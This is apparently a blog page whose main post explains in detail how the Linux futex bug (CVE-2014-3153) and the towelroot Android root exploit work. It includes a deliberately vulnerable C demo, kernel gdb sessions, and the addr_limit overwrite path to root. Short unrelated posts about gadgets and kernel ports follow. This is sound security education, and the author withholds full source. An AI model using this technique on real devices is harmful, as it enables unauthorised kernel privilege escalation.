Exploiting the Futex Bug and uncovering Towelroot

The Futex bug (CVE-2014-3153) is a serious bug that affects most Linux kernel version and was made popular by geohot in his towelroot exploit. You can read the original comex report at hackerone. Others have succesfully implemented this (this one for example), but no public exploit source code is available.

This post will describe in detail about what exactly is the futex bug, how to exploit the futex bug, and also explains how towelroot works and what the modstring in Towelroot v3 actually do. Following the footsteps of other security researchers, I will not give a full source code to the exploit. By giving enough details, I hope programmers can learn and appreciate the exploit created for this bug. By not releasing the source, I hope this should stop most script kiddies. There will be some small details that I will gloss over (about the priority list manipulation), so it will require some thinking and experimentation to implement the exploit.

One thing to note: I did some kernel programming, but never written a kernel exploit before, so this is my first time, I hope this is a good write up for a newbie exploit writer like me. Distributing the exploit source code will be useful only to handful of people, but writing about it will be useful to all programmers interested in this.

Towelroot is not opensource, and the binary is protected from reverse engineering by compiling it with llvm-obfuscator. When I started, I tried using 64 bit kernel on my desktop, and was not successful because I can’t find a syscall that can alter the stack in the correct location. So I decided to do a blackbox reverse engineering by looking at syscalls used by towelroot. Since (I think) I know how towelroot works, I will discuss about it, and I hope it will help people to understand/modify modstrings used in towelroot v3.

If you are an exploit hacker, just jump to “on to the kernel” part. The initial part is only for those unexperienced in writing exploits.

Before exploiting this bug we need to understand what the bug is. In short, the bug is that there is a data structure in the stack, that is part of a priority list that is left there and can be manipulated. This is very vague for most of programmers, so lets break it down. You need to understand what a stack is and how it works.

The Stack

A stack is a block of memory set aside for local variable, for parameter passing, and for storing return address of a procedure call. Usually when we talk about stack and exploits, we try to alter the return address and redirect it to another address and probably do ROP (Return Oriented Programming). This is not the case with this bug, so forget about that. Even though this bug is about futex, this is also not a race condition bug.

Stack memory is reused accross procedure calls (not cleared) . See this simple example:

#include <stdio.h>

int foo(int initialize, int val)
{
	int local;

	if (initialize) {
		local = val;
	} else {
		printf("local foo is %d\n", local);
	}

}

int bar(int initialize, int val)
{
	int local;

	if (initialize) {
		local = val;
	} else {
		printf("local bar is %d\n", local);
	}

}



int main()
{
	foo(1, 10); //set to 10
	foo(0, 0); //print it
	bar(1, 12); //set to 12
	foo(0, 0); //print foo again

	return 0;
}

You can compile then run it:

gcc test.c -o mytest

Note: just compile normally, don’t use any optimization level (-Ox):

$./mytest
local foo is 10
local foo is 12

As you can see, both procedures uses exactly the same stack layout. Both local uses the same stack location. When bar is called, it writes to the same stack location used by “foo” for its local variable. This simple concept will play a role in understanding the bug.

Next topic is about linked list. Usually a pointer based data structure uses heap for storing the elements (We don’t use stack because we want the elements to be “permanent” accross calls), but sometimes we can just use the stack, as long as we know that the element is going to be removed when the function exits, this will save time in allocation/deallocation. Here is an example of a made up problem where we put in an element located in the stack then removing it again before returning.

/*a made up problem where we need to add a temporary element*/
void function1(struct list *lst, int val)
{
	struct node n;
	n.value = 99999;
	n.next = NULL;

	list_add(lst, &n);

	//we want to always have 99999 at the end of print
	list_print(lst);

	list_remove_last_element(lst);
}

In that example, if we don’t remove the element and we return, the app will likely crash when the stack content is altered then the list js manipulated. That is the simplified version of the bug in the userland.

To exploit the bug, we need a good understanding of how futex work, especially the PI (Priority Inheritance Futex). There are very good papers that you can read about this topic. The first one is: Futexes Are Tricky, this will give a you an idea about what futex is and how it works. The other one is Requeue-PI: Making Glibc Condvars PI-Aware, this will give you a very thorough details about the PI futex implementation in the kernel. I suggest someone trying to implement the exploit to read at least the second paper.

For those of you who are not that curious to read the papers, I will try to simplify it: when there are tasks waiting for a pi futex, the kernel creates a priority list of those tasks (to be precise, it creates a waiter structure for that task) . A priority list is used because we want to maintain a property of a pi futex, i.e, task with a high priority will be waken first even though it waits after a low priority task.

The node of this priority list is stored in the kernel stack. Note that when a task waits for a futex, it will wait in kernel context, and will not return to user land. So the use of kernel stack here completely makes sense. Please note that before kernel 3.13, the kernel uses plist, but after 3.13 it uses rb_node for storing the list. If you want to exploit latest kernel, you will need to handle that.

This is actually where the bug is: there is a case where the waiter is still linked in the waiter list and the function returns. Please note that a kernel stack is completely separate from user stack. You can not influence kernel stack just by calling your own function in the userspace. You can manipulate kernel stack value (like the first example) by doing syscall.

If you don’t understand much about kernel, you can imagine a syscall is like a remote call to another machine: the execution on the other “machine” will use a separate stack from the one that you use in your local (user mode code). Note that this analogy doesn’t really hold when we talk about exploiting memory space.

A simpler bug

Before going into the detail about how the bug can be exploited in the kernel. I will present a much smaller and easier to understand userland code that has a similar bug. After you understand this, I will show how the kernel exploit works based on the same principle:

/**
 * An example of bug that can be exploited through stack manipulation
 * Use -m32 to compile as 32 bit app, so that the int size is the same as pointer size
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct node {
       const char *value;
       struct node *next;
       struct node *prev;
};

struct list {
       struct node *head;
       struct node *tail;
};

void list_add(struct list *lst, struct node *newnode)
{
	if (lst->head==NULL) {
		lst->head = newnode;
		lst->tail = newnode;
	} else {
		newnode->prev = lst->tail;
		lst->tail->next = newnode;
		lst->tail = newnode;
	}
}

struct node * list_remove_last(struct list *lst) 
{
	struct node *result;
	result = lst->tail;

	if (lst->head==lst->tail) { /*zero or 1 element*/
		lst->head = lst->tail = NULL;
	} else  {
		lst->tail = lst->tail->prev;
		lst->tail->next = NULL;
	}
	return result;
}

void list_print(struct list *lst)
{
	struct node *tmp;
	tmp = lst->head;
	while (tmp) {
		printf("Value = %s\n", tmp->value);
		tmp = tmp->next;
	}
}

void list_add_new(struct list *lst, const char *val)
{
	struct node *newnode  = (struct node *)malloc(sizeof(struct node));
	newnode->next = NULL;
	newnode->value = strdup(val);
	list_add(lst, newnode);
}	


void print_with_end_of_list(struct list *lst)
{
	struct node instack;
	instack.next = 0;
	instack.value = "--END OF LIST--";

	printf("Not a buggy function\n");

	list_add(lst, &instack);
	list_print(lst);
	/*we ignore the returned node*/
	list_remove_last(lst);
}


void buggy_print_with_end_of_list(struct list *lst)
{
	int dummy_var1; /*see the article to see why i introduced this*/
	int dummy_var2;
	int dummy_var3;

	struct node instack;

	printf("a buggy function, here is the location of value on stack %p\n", &instack.value);

	instack.next = 0;
	instack.value = "--END OF LIST--";


	list_add(lst, &instack);
	list_print(lst);
	/*we 'forgot' to remove the list element*/

}

void a_function_to_exploit(int element_number, void * value)
{
	int i;
	int buf[10];
	if (element_number==-1) { /*print addressed of buf*/
		for (i=0; i < 10; i++) {
			printf("location of buf[%d] is %p\n", i, &buf[i]);
		}
		return;
	}

	buf[element_number] = (int)value;	

}


int main(int argc, char * argv[])
 {
	struct list mylist;
	mylist.head = NULL;
	mylist.tail = NULL;
	int pos;
	char *val;

	/*we have one parameter*/
	pos = -1;
	if (argc==3) {
		pos = atoi(argv[1]);
		val = argv[2];
	}       

	printf("we will use pos: %d\n", pos);

	list_add_new(&mylist, "Alpha");
	list_add_new(&mylist, "Beta");
	print_with_end_of_list(&mylist);
	buggy_print_with_end_of_list(&mylist);

	a_function_to_exploit(pos, val);

	list_print(&mylist);

	/*this is just a demo, i am skipping the cleanup code*/
	return 0;
}

First, you will need to compile this in 32 bit mode, so the sizeof int is the same as the size of pointer (32 bit), don’t use any optimization when compiling.

gcc -m32 list1.c

Then run the resulting executable without any parameters it will print something like this:

$ ./mylist 
we will use pos: -1
Not a buggy function
Value = Alpha
Value = Beta
Value = --END OF LIST--
a buggy function, here is the location of value on stack 0xffd724a4
Value = Alpha
Value = Beta
Value = --END OF LIST--
location of buf[0] is 0xffd72488
location of buf[1] is 0xffd7248c
location of buf[2] is 0xffd72490
location of buf[3] is 0xffd72494
location of buf[4] is 0xffd72498
location of buf[5] is 0xffd7249c
location of buf[6] is 0xffd724a0
location of buf[7] is 0xffd724a4
location of buf[8] is 0xffd724a8
location of buf[9] is 0xffd724ac
Value = Alpha
Value = Beta
Value = --END OF LIST--

Notice the location of value on stack, which in this example is 0xffd724a4. Notice that it is the same as the address of buf[7]. Now run the test again, like this:

$./mylist 7 HACKED
we will use pos: 7
Not a buggy function
Value = Alpha
Value = Beta
Value = --END OF LIST--
a buggy function, here is the location of value on stack 0xffd3bd34
Value = Alpha
Value = Beta
Value = --END OF LIST--
Value = Alpha
Value = Beta
Value = HACKED

There is no assignment of the value “HACKED” to the list element, but it printed the word “HACKED”. Why this works? because we assign to the exact memory location in stack where “value” was stored. Also note that the location printed is now different because of ASLR, but because the position is the same in the stack, element number 7 is also relocated to the same address.

Now try out if you use other value than 7, also try a very small or very large value. You can also try this with stack protector on:

gcc -m32 -fstack-protector list1.c

The element that matched the address will be different (may be 7 becomes 8 or 6), but the exploit will still work if you adjust the element number with the matching address.

In this example, I made a very convenient function that makes the “exploit” easy (named a_function_to_exploit). In the real world, if we want to modify certain location in stack, we need to find a function that has a correct “depth” (that is: the stack size usage is at least the same as the function that we are trying to exploit), and we need to be able to manipulate the value on that stack depth. To understand about stack depth, you can comment the dummy_var1/dummy_var2/dummy_var3, compile, and see the stack address change. You can also see that if the function is optimized, certain variables are no longer in stack (moved to registers if possible).

Writing using list

Once you know how to manipulate an element of the list, you can write to certain memory address. On all exploits what you want to do is to write something to an address. To make this part short and to show my point, I will give an example for a simple linked list. If we have this:

void node_remove(struct node *n)
{
	//lets skip handling for first and last element, 
        //assume that we only delete something in the middle
	struct node *prevnode = n->prev;
	struct node *nextnode = n->next;
	nextnode->prev = prevnode;
	prevnode->next = nextnode;

}

Assume that we can control the content of n, we can write almost arbitrary value to arbitrary address. Lets assume that prev is in offset 4 of the node, and next is in offset 8. Please note that this structure assignment:

A->B = C;

is the same as:

*(A + offset_B) = C;

Lets assume we want to overwrite memory at location X with value Y. First prepare a fake node for the “next”, this fakenext is located at memory location Y (the location of the fake node is the value that we want to write), Of course this is limited to accessible memory space (so segmentation fault will not happen).

If we just want to change a value from 0 (for example: a variable containing number 0 if something is not allowed) to any non zero number (something is allowed), then we can use any number (we don’t even need a fake element, just a valid pointer to the “next” element).

n->next = fakenext;
n->prev = X-8

so when we call, this is what happens:

(n->next)->prev = n->prev;
(n->prev)->next = n->next

since n->next points to our fakenode

(fakenode)->prev = n->prev;
(n->prev)->next = fakenode

You can read more about this kind of list manipulation by searching google for heap exploits. For example, there are several articles about exploiting memory allocator in Phrack that uses list in the implementation (Vudo Malloc Tricks, Once upon a free, Advanced Doug lea’s malloc exploits and Malloc Des-Maleficarum).

These two things: that stack content can be manipulated, and that a manipulated list can be used to write to any address is the basis of the futex exploit.

On to the Kernel

Now lets go to where the bug is on the kernel.

static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
				 u32 val, ktime_t *abs_time, u32 bitset,
				 u32 __user *uaddr2)
{
	struct hrtimer_sleeper timeout, *to = NULL;
	struct rt_mutex_waiter rt_waiter;
	struct rt_mutex *pi_mutex = NULL;
	struct futex_hash_bucket *hb;
	union futex_key key2 = FUTEX_KEY_INIT;
	struct futex_q q = futex_q_init;
	int res, ret;

	//...

	q.rt_waiter = &rt_waiter;

	//...

	//futex_wait_queue_me(hb, &q, to);

	if (!q.rt_waiter) {

	//...

You can also see the full code for futex_wait_requeue_pi().

In my simple userland code, there is a variable called instack that we want to manipulate, this time, we are interested in rt_waiter. In the case where futex requeue is called with uaddr1==uaddr2, the code path will cause q.rt_waiter to be NULL, but actually the waiter is still linked in the waiter list.

static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
			 u32 __user *uaddr2, int nr_wake, int nr_requeue,
			 u32 *cmpval, int requeue_pi)

And the source code for futex_requeue()

Now we need a corresponding function for a_function_to_exploit. This syscall must be “deep” enough to touch the rt_waiter, so a syscall that doesn’t have a local variable, and doesn’t call other function is not usable.

First lets examine the function when we call it. From now on to show certain things, I will show how it looks in gdb that is connected to qemu for kernel debugging. Since I want to show things about towelroot, I am using qemu with ARM kernel. I am using this official guide for building Android kernel combined with stack overflow answer. When compiling the kernel, don’t forget to enable debug symbol. I created an Android 4.3 AVD, and started the emulator with this:


~/adt-bundle-linux/sdk/tools/emulator-arm -show-kernel -kernel arch/arm/boot/zImage -avd joeavd -no-boot-anim -no-skin -no-audio -no-window -logcat *:v -qemu -monitor telnet::4444,server -s

I can control the virtual machine via telnet localhost 444, and debug using gdb:

$ arm-eabi-gdb vmlinux

To connect and start debugging:

(gdb) target remote :1234

Why do I use GDB? Because this is the easiest way to get size of structure and to know what optimizations the compiler did. Lets break on the futex_wait_requeue_pi:

Breakpoint 6, futex_wait_requeue_pi (uaddr=0xb6e8be68, flags=1, val=0, abs_time=0x0, bitset=4294967295, uaddr2=0xb6e8be6c) at kernel/futex.c:2266
2266    {
(gdb) list
2261     * <0 - On error
2262     */
2263    static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
2264                                     u32 val, ktime_t *abs_time, u32 bitset,
2265                                     u32 __user *uaddr2)
2266    {
2267            struct hrtimer_sleeper timeout, *to = NULL;
2268            struct rt_mutex_waiter rt_waiter;
2269            struct rt_mutex *pi_mutex = NULL;
2270            struct futex_hash_bucket *hb;
(gdb) list
2271            union futex_key key2 = FUTEX_KEY_INIT;
2272            struct futex_q q = futex_q_init;
2273            int res, ret;

We can see the structures

(gdb) ptype timeout
type = struct hrtimer_sleeper {
    struct hrtimer timer;
    struct task_struct *task;
}

(gdb) ptype rt_waiter
type = struct rt_mutex_waiter {
    struct plist_node list_entry;
    struct plist_node pi_list_entry;
    struct task_struct *task;
    struct rt_mutex *lock;
}

We can also check the backtrace of this function

(gdb) bt
#0  futex_wait_requeue_pi (uaddr=0xb6e8be68, flags=1, val=0, abs_time=0x0, bitset=4294967295, uaddr2=0xb6e8be6c) at kernel/futex.c:2266
#1  0xc0050e54 in do_futex (uaddr=0xb6e8be68, op=, val=0, timeout=, uaddr2=0xb6e8be6c, val2=0, val3=3068706412)
    at kernel/futex.c:2668
#2  0xc005100c in sys_futex (uaddr=0xb6e8be68, op=11, val=0, utime=, uaddr2=0xb6e8be6c, val3=0) at kernel/futex.c:2707
#3  0xc000d680 in ?? ()
#4  0xc000d680 in ?? ()

We can print out the size of the structures:

(gdb) print sizeof(rt_waiter)
$1 = 48
(gdb) print sizeof(timeout)
$2 = 56
(gdb) print sizeof(to)
$3 = 4
(gdb) print sizeof(q)
$4 = 56
(gdb) print sizeof(hb)
$5 = 4

We can look at the addresses of things, in this case, the variable pi_mutex is optimized as register, so we can't access the variable address.

(gdb) print &key2
$6 = (union futex_key *) 0xd801de04
(gdb) print &timeout
$7 = (struct hrtimer_sleeper *) 0xd801de40
(gdb) print *&to
Can't take address of "to" which isn't an lvalue.
(gdb) print &rt_waiter
$8 = (struct rt_mutex_waiter *) 0xd801de10
(gdb) print &pi_mutex
Can't take address of "pi_mutex" which isn't an lvalue.
(gdb) print &hb
$9 = (struct futex_hash_bucket **) 0xd801ddf8
(gdb) print &q
$10 = (struct futex_q *) 0xd801de78

In the linux kernel source dode, there is a very convenient script that can measure stack usage of functions, unfortunately this doesn't work very well on ARM, but here is an example output in i386.

objdump -d vmlinux | ./scripts/checkstack.pl


...
0xc10ff286 core_sys_select [vmlinux]:			296
0xc10ff4ac core_sys_select [vmlinux]:			296
...
0xc106a236 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc106a380 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
...
0xc14a406b sys_recvfrom [vmlinux]:			180
0xc14a4165 sys_recvfrom [vmlinux]:			180
0xc14a4438 __sys_sendmmsg [vmlinux]:			180
0xc14a4524 __sys_sendmmsg [vmlinux]:			180
...

The numbers on the right shows the maximum stack usage that was accessed by that function. The rt_waiter is not the last variable on stack, so we don't really need to go deeper than 212. The deeper the stack, the lower address value will be used, in our case, we can ignore the hashbucket, key2, q, that totals in 64 bytes. Any syscall that has a stack use of more than 212-64 is a candidate.

Learning from geohot's exploit, he found that there are four very convenient functions that can be used, this is the fist value in towelroot modstring, sendmmsg, recvmmsg, sendmsg, and recvmsg (each corresponds to method 0-3 in his towelroot modstring).

Knowing the address of rt_waiter, lets see the kernel stack when towelroot calls sys_sendmmsg and look at the iovstack array.

(gdb) print &iovstack[0]
$17 = (struct iovec *) 0xd801ddf0
(gdb) print &iovstack[1]
$18 = (struct iovec *) 0xd801ddf8
(gdb) print &iovstack[2]
$19 = (struct iovec *) 0xd801de00
(gdb) print &iovstack[3]
$20 = (struct iovec *) 0xd801de08
(gdb) print &iovstack[4]
$21 = (struct iovec *) 0xd801de10

Look at that, the iovstack[4] is in the same address as rt_waiter

(gdb) print iovstack
$22 = {{iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 125}, {
    iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 1050624}, {iov_base = 0xa0000800, iov_len = 125}, {
    iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 125}}

And now lets see the iov as struct rt_mutex_waiter

(gdb) print *(struct rt_mutex_waiter*)&iovstack[4]
$23 = {list_entry = {prio = -1610610688, prio_list = {next = 0x100800, prev = 0xa0000800}, node_list = {next = 0x7d, prev = 0xa0000800}},
  pi_list_entry = {prio = 125, prio_list = {next = 0xa0000800, prev = 0x7d}, node_list = {next = 0xa0000800, prev = 0xa0000800}},
  task = 0xa0000800, lock = 0xa0000800}

Of course this function can return immediately when the data is received on the other side. So what towelroot do is this: create a thread that will accept a connection in localhost, after it accept()s it, it never reads the data, so the sendmmsg call will be just hanging there waiting for the data to be sent. So the receiver thread looks like this:

bind()
listen()
while (1) {
      s = accept();
      log("i have a client like hookers");
}

As you can see in the simplest list example, that a compiler optimization can cause the address to change slightly, so the other parameter in the modstring is the hit_iov, so in the towelroot code, it looks something like this:

        for (i =0 ;i < 8; i++) {
                iov[i].iov_base = (void *)0xa0000800;
                iov[i].iov_len = 0x7d;
                if (i==TARGET_IOV) {
                        iov[i].iov_len = 0x100800;
                }
        }

The other parameter related to iov is the align. I am not completely sure about this and when this is needed. From my observation, it sets all iov_len to 0x100800.

On the other thread, basically what towelroot does is this:

void sender_thread(){
     setpriority(N);
     connect(to_the_listener);
     futex_wait_requeue_pi(...);
     sendmmsg(...) ;
}

Unfortunately, having multi core can ruin things, so to make things safe, before starting, towelroot will set the process affinity so that this process will be run on only one core.

The detail of manipulating the waiter priority list is left to the reader (the objective is to write to a memory address) , but I can give you some pointers: to add a new waiter, use FUTEX_LOCK_PI, and to control where the item will be put, call setpriority prior to waiting. The baseline value is 120 (for nice value 0), so if you set priority 12 using setpriority, you will see the priority as 132 in the kernel land. The total line of plist.h and plist.c is only around 500 lines, and you only need to go to detail for plist_add and plist_del. Depending on what we want to overwrite, we don't even need to be able to set to a specific value.

To modify the list, you will need multiple threads with different priorities. To be sure that the threads you started is really waiting inside a syscall (there will be time from creating the thread calling the syscall until it waits inside the syscall), you can use the trick that is used by towelroot: it reads the /proc/PID/task/TID/status of the Task with TID that you want to check. When the process is inside a syscall, the voluntary_ctxt_switches will keep on increasing (and the nonvoluntary_ctxt_switches will stay, but towelroot doesn't check this). A voluntary context switch happens when a task is waiting inside a syscall.

Usually what people do when exploiting the kernel is to write to a function pointer. We can get the location of where these pointers are stored from reading /proc/kallsysms, or by looking at System.map generated when compiling the kernel. Both is usually not (easily) available in latest Android (this is one of the security mitigations introduced in Android 4.1). You may be able to get the address by recompiling an exact same kernel image using the same compiler and kernel configuration. On most PC distributions, you can find the symbols easily (via System.map and /proc/kallsyms is not restricted.

Assume that you can somehow get the address of a function pointer to overwrite, we can write a function that sets the current process credential to have root access and redirect so that our function is called instead of the original. But there is another way to change the process credential without writing any code that runs in kernel mode, just by writing to kernel memory. You can read the full presentation here, in the next part, I will only discuss the part needed to implement the exploit.

The Kernel Stack

Every thread is assigned a kernel stack space, and part of the stack space contains thread_info for that task. The stack address is different for every thread (the size is 8KB/thread in ARM) and you can not predict the address. So there will be a bunch of 8 KB stack blocks allocated for every thread. The thread_info is stored in the stack, in the lower address (stacks begins from top/high address). This thread_info contains information such as the pointer to task_struct. Inside a syscall, the task_struct for current thread is accessible by using the current macro:

#define get_current() (current_thread_info()->task)
#define current get_current() 

In ARM, current_thread_info() is defined as:

 #define THREAD_SIZE             8192

 static inline struct thread_info *current_thread_info(void)
 {
         register unsigned long sp asm ("sp");
         return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
 }

Or if you want a constant number, the thread_info is located here $sp & 0xffffe000. Here is an example of task info when I am inside a syscall:

(gdb) print  *((struct thread_info*)(((uint32_t)$sp & 0xffffe000)))
$23 = {flags = 0, preempt_count = 0, addr_limit = 3204448256, task = 0xd839d000, exec_domain = 0xc047e9ec, cpu = 0, cpu_domain = 21, cpu_context = {
    r4 = 3626094784, r5 = 3627667456, r6 = 3225947936, r7 = 3626094784, r8 = 3561353216, r9 = 3563364352, sl = 3563364352, fp = 3563372460, 
    sp = 3563372408, pc = 3224755408, extra = {0, 0}}, syscall = 0, used_cp = "\000\000\000\000\000\000\000\000\000\000\001\001\000\000\000", 
  tp_value = 3066633984, crunchstate = {mvdx = {{0, 0} }, mvax = {{0, 0, 0}, {0, 0, 0}, {0, 0, 0}, {0, 0, 0}}, dspsc = {0, 0}}, 
  fpstate = {hard = {save = {0 }}, soft = {save = {0 }}}, vfpstate = {hard = {fpregs = {334529072224223236, 0, 
        0, 0, 0, 4740737484919406592, 4562254508917369340, 4724999426224703930, 0 }, fpexc = 1073741824, fpscr = 16, 
      fpinst = 3725516880, fpinst2 = 2816}}, restart_block = {fn = 0xc0028ca8 , {futex = {uaddr = 0x0, val = 0, flags = 0, 
        bitset = 0, time = 0, uaddr2 = 0x0}, nanosleep = {clockid = 0, rmtp = 0x0, expires = 0}, poll = {ufds = 0x0, nfds = 0, has_timeout = 0, 
        tv_sec = 0, tv_nsec = 0}}}}

Before continuing, you need to get a feeling of the memory mapping. This document doesn't help much, but it gives an idea. Since every kernel can be compiled to have a different mapping, lets assume a common mapping for 32 bit ARM kernel:

  • a very low memory address (0x0-0x1000) is restricted for mapping (for security purpose)
  • address 0x1000-0xbf000000 is the user space
  • around 0xc0000000- 0xcffffff is where the kernel code location
  • area around 0xdxxxxxxx-0xfefffffe is where the kernel data is (stack and heap)
  • high memory ranges (0xfeffffff-0xffffffff) is reserved by the kernel.

The addr_limit is a nice target for overwrite. The default value for ARM is 3204448256 (0xbf000000), this value is checked in every operation in kernel that copy values from and to user space. You can read more about this in this post (Linux kernel user to kernel space range checks). The addr_limit is per task (every thread_info can have a different limit).

Area below addr_limit is considered to be a valid memory space that user space process can pass to kernel as parameter. Just to be clear here: if we modify addr_limit, it doesn't mean that the user space can suddenly access memory at kernel space (for example, you can't just dereference an absolute memory like this: *(uint32_t*)0xc0000000 to access kernel space from user space). The kernel can always read all the memory, so what this limit does is to make sure that when a user space gives a parameter to a syscall, the address given must be in user space. For example, kernel will not allow write(fd, addr, len) if addr is above addr_limit.

If we can somehow increase this limit, we can then read and modify kernel structures (using read/write syscall). Using a list manipulation, we can overwrite an address, and the location of addr_limit the one we want to overwrite.

Once we overwrite the addr_limit (in arm it is located at offset 8 in thread_info after flags and preempt_count), we can then (from userspace) read the address of the task_struct field, then from there, read the address of our credential (cred) field, then write/set our uid/gid to 0, and spawn a root shell (or do anything that you like, for example: just chown root/chmod suid certain file).

Kernel stack location

So basically we have two problems here: how to find the address to overwrite, and how to overwrite it. The part about "how to overwrite" is done by the list manipulation. The part about finding the address to overwrite: use other kernel vulnerability to leak kernel memory. There are a lot of bugs in the Linux kernel where it leaks memory to userspace (here is all of them in that category, there are 26 this year, and 194 in total), not all of these bugs can be used to leak the location of the stack.

Because the thread_info is always located at the beginning of stack, we can always find it if we know any address that is located in the stack, (just use addr & 0xffffe000). So we don't really care about the exact leaked address. In the kernel space, there are a lot of code where a stack variable points to another variable. Just for an example, here is ">a code in futex.c that does this:

q.rt_waiter = &rt_waiter;
q.requeue_pi_key = &key2;

Both rt_waiter and key2 are located in the stack. If there is a code in the kernel that copies data to user space from uninitialized data on stack it, then will use whatever previous values that was on that stack, this is what we call an information leak. For a specific kernel version with a specific compiler we can get a reliable address, but with different kernel version and different compiler version (and optimization), most of the time this is not very reliable (it really depends on the previous usage of the stack and the stack layout created by the compiler). We can check for the leaked value, if we see a value above the addr_limit, what we get is a possible stack location.

Towelroot uses CVE-2013-2141 which is still in most Android kernel. You can check your kernel if it is affected by looking at the patch that corresponds to that bug (just check if info is initialized like this: struct siginfo info = {}). You can experiment a little bit to get a (mostly) reliable kernel stack address leak. This is the value that is printed by towelroot ("xxxx is a good number"). Please note that this is not 100% reliable, so sometimes towelroot will try to modify invalid address (it doesn't seem to check if the address is above bf000000). Lets say we find the (possible) memory and name this POSSIBLE_STACK from now on.

Update: I was wrong, towelroot uses the stack address from the unlinked waiter address. The waiter is unlinked because of the tgkill() call. So the address should always be valid.

Overwrite

Ideally we want to be able to read the whole kernel space, but we can start small, increase our limit a little bit. You may have noticed several things by now: the rt_waiter is stored in the stack (lets say in location X), the addr_limit is also stored in stack (lets say Y), the X location is going to be always greater than Y for that thread. We know that the thread_info is always located at sp & 0xffffe000, so we have POSSIBLE_THREAD_INFO = (POSSIBLE_STACK & 0xffffe000). So if we can put the address of any rt_waiter from other tasks and write it to (POSSIBLE_THREAD_INFO + 8), we have increased the stack limit from bf000000 to some value (usually dxxxxxxx).

I am not entirely sure (since I don't have a samsung S5), but it seems that the addr_limit is not always in offset 8, so towelroot have limit_offset to fix the address.

How to know if we have succesfully changed the address limit for a task? From inside that task, we can use the write syscall. For example, we can try: write(fd, (void *)0xc0000000, 4) . What we are trying to do is to write the content of the memory address to a file descriptor (you can replace 0xc000000 with any address above 0xbf000000). If we can do this successfuly, then we can continue because our limit has been changed.

On my experiment, the memory leak is sometimes very predictable (it leaks always a certain task kernel address, but not always). If we know exactly which thread address we modify, we can ask that thread to continue our work, otherwise, we need to ask all the threads that we have (for example by sending a signal): can you check if the address limit have been changed for you? If a thread can read the kernel memory address, then we know the address of that thread's thread_info, we can then read and write to POSSIBLE_THREAD_INFO + 8. First thing that we want to do is to change *(POSSIBLE_THREAD_INFO + 8) = 0xffffffff. Now this thread can read and write to anywhere.

Here is an example where a thread's addr_limit has been successfully changed to 0xffffffff:

(gdb) print  *((struct thread_info*)(((uint32_t)$sp & 0xffffe000)))
$22 = {flags = 0, preempt_count = 0, addr_limit = 4294967295, task = 0xd45d6000, exec_domain = 0xc047e9ec, cpu = 0, cpu_domain = 21, cpu_context = {
    r4 = 3561369728, r5 = 3562889216, r6 = 3225947936, r7 = 3561369728, r8 = 3562677248, r9 = 3069088276, sl = 3561955328, fp = 3561963004, 
    sp = 3561962952, pc = 3224755408, extra = {0, 0}}, syscall = 0, used_cp = "\000\000\000\000\000\000\000\000\000\000\001\001\000\000\000", 
  tp_value = 3061055232, crunchstate = {mvdx = {{0, 0} }, mvax = {{0, 0, 0}, {0, 0, 0}, {0, 0, 0}, {0, 0, 0}}, dspsc = {0, 0}}, 
  fpstate = {hard = {save = {0 }}, soft = {save = {0 }}}, vfpstate = {hard = {fpregs = {1067681969331808106, 0, 
        0, 0, 0, 4738224773140578304, 4562254508917369340, 4732617274506747052, 0 }, fpexc = 1073741824, fpscr = 16, 
      fpinst = 3725475920, fpinst2 = 2816}}, restart_block = {fn = 0xc0028ca8 , {futex = {uaddr = 0x0, val = 0, flags = 0, 
        bitset = 0, time = 0, uaddr2 = 0x0}, nanosleep = {clockid = 0, rmtp = 0x0, expires = 0}, poll = {ufds = 0x0, nfds = 0, has_timeout = 0, 
        tv_sec = 0, tv_nsec = 0}}}}

Once you can read/write anywhere, you can do anything, its game over. First you may want to fix the plist so that it will not crash (something that was not done by towelroot v1), although sometimes in towelroot v3, it stops because it was unable to fix the list even though it can do the rooting process. Even though you can read/write using file, to make it easy you can use pipe, and write/read to/from that pipe.

If we have a pipe, with rfd as read descriptor in the side of the pipe and wfd as the write descriptor, we can do this: To read a memory from kernel: do a write(wfd, KERNEL_ADDR, size), and read the result in read(rfd, LOCAL_ADDRESS, size). To write to kernel memory: do a write(wfd, LOCAL_ADDRESS, size), and then read(rfd, KERNEL_ADDRESS, size).

If you want to play around without creating exploit, you can also try out the addr_limit by setting the value manually in your debugger.

The last modstring in towelroot is temp_root which is not related to the exploit itself, it only creates temporary root for devices that have non writeable /system.

So thats all there is to it. I have shown you where the bug is, which syscall that you can use to manipulate the stack, how to write to arbitrary address (although not in detail, but with enough pointers), what to write there, and what to do after you write there.

SmartQ7

I just got my SmartQ 7 few days ago. In this post I want to share some technical thing (not a full review, you can find it somewhere else). Before giving my opinion about this device, I want to give quick update: I haven’t done much progress on the STR9104 FreeBSD port except to keep it up to date with FreeBSD Current. I am planning to start to work on it again this week. Andrew Certain have added joystick support for AppleWii. See the Google Code for latest version.

I bought this device from DealExtreme for 206.1 USD , this is the first expensive thing that I bought from DealExtreme (I only bought small things from then, usually my total is less than 20 USD). The thing shipped in about 10 days, but I need to get the thing from the post office, because I need to pay extra tax 350 baht (~11 USD).
Continue reading “SmartQ7”

Too many things to do

There are so many things to do lately, but so little time. Plus i have so many dental problems lately, three of my molar teeth has been pulled out in the last 2 months, and going to have the fourth taken next month. Going to dentist and waiting for the recovery always takes away my free time.

My wife just bought Nokia 5800, a Nokia series 60 5th edition phone. It means that i need to finish my SymbianBible port for 5th edition (mostly done, beta version is on symbianbible google groups). My wife also asked me to port MultiCounter to her new phone (done, not yet uploaded).

I have cleaned up the 2.6.29 port of STR9104 Soc, but i will need to clean up again, because of the new documentation from www.cnusers.org. I have also started the freebsd port, but the progress is not much yet.
Continue reading “Too many things to do”

STAR9104: Linux Kernel 2.6.29 and Starting FreeBSD port

I’ve finally updated my patch to 2.6.29, the patch can be downloaded from:
http://tinyhack.com/agestar/patch-2.6.29-star.gz

and the config file:

http://tinyhack.com/agestar/config-2.6.29-star

or if you want the image that i already compiled and test (image is compiled with 32 MB memory). This is NOT a FIRMWARE

